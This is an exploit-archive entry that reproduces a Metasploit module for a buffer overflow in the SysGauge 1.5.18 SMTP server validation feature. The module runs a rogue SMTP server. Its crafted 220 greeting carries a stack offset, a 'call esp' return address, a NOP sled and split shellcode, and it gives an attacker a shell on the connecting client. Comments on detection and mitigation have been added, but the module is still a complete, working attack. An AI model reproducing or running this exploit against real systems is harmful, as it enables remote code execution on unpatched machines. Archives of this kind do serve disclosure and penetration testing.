SysGauge SMTP Validation Buffer Overflow

2017-03-22T00:00:00
ID PACKETSTORM:141761
Type packetstorm
Reporter Chris Higgins
Modified 2017-03-22T00:00:00

Description

                                        
#
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
#  
  
# Client-side exploit module for SysGauge 1.5.18's SMTP server validation.
# The TcpServer mixin makes this module the *server*: it listens on SRVPORT and
# sends a crafted "220" greeting to whichever client connects, so the vulnerable
# party is the SysGauge client that opens the validation connection, not a host
# this module connects to.
# Defensive note: the greeting built in on_client_connect is several hundred bytes
# of mostly random/binary data, far outside what a normal SMTP banner looks like;
# that makes it a practical detection point on the client network. Mitigation is on
# the client side (updating SysGauge); the fixed version is not stated in this module.
class MetasploitModule < Msf::Exploit::Remote  
include Msf::Exploit::Remote::TcpServer  
  
Rank = NormalRanking  
  
# Module metadata and options. Payload 'Space' (306) is the maximum encoded
# payload size; 'BadChars' are bytes the payload must not contain (NUL, CR, LF
# and space, all of which would terminate or split the banner line). The single
# target carries the stack 'Offset' to the saved return address and a 'Ret'
# address described as a "call esp" gadget in QtGui4.dll.
def initialize()  
super(  
'Name' => 'SysGauge SMTP Validation Buffer Overflow',  
'Description' => %q{  
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18  
via its SMTP server validation. The module sends a malicious response along in the  
220 service ready response and exploits the client, resulting in an unprivileged shell.  
},  
'Author' =>  
[  
'Chris Higgins', # msf Module -- @ch1gg1ns  
'Peter Baris' # Initial discovery and PoC  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'EDB', '41479' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Payload' =>  
{  
'Space' => 306,  
'BadChars' => "\x00\x0a\x0d\x20"  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows Universal',  
{  
'Offset' => 176,  
'Ret' => 0x6527635E # call esp # QtGui4.dll  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => 'Feb 28 2017',  
'DefaultTarget' => 0  
)  
# SRVPORT defaults to 25 so the client's validation connects to the standard SMTP port.
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),  
])  
end  
  
# Invoked by the TcpServer mixin for each accepted connection.
# Builds the crafted greeting line (status code, filler, payload halves, return
# address, NOP sled, trailing banner text) and writes it to the client; the
# connection is not closed here, so the mixin's lifecycle handles teardown.
# @param c [Object] accepted client connection supplied by TcpServer; this method
#   only uses c.peerhost (logging) and c.put (write).
# NOTE(review): both payload.encoded slices assume the encoded payload is at
#   least 233 bytes long (Space is 306); a shorter payload would make the first
#   slice nil and the `<<` raise TypeError — confirm against the encoder's output.
def on_client_connect(c)  
# Note here that the payload must be split into two parts.  
# The payload gets jumbled in the stack so we need to split  
# and align to get it to execute correctly.  
sploit = "220 "  
sploit << rand_text(target['Offset'])  
# Can only use the last part starting from 232 bytes in  
sploit << payload.encoded[232..-1]  
sploit << rand_text(2)  
sploit << [target.ret].pack('V')  
sploit << rand_text(12)  
sploit << make_nops(8)  
# And the first part up to 232 bytes  
sploit << payload.encoded[0..231]  
# Trailing text keeps the line looking like a greeting and supplies the CRLF that ends it.
sploit << "ESMTP Sendmail \r\n"  
  
print_status("Client connected: " + c.peerhost)  
print_status("Sending payload...")  
  
c.put(sploit)  
end  
  
end  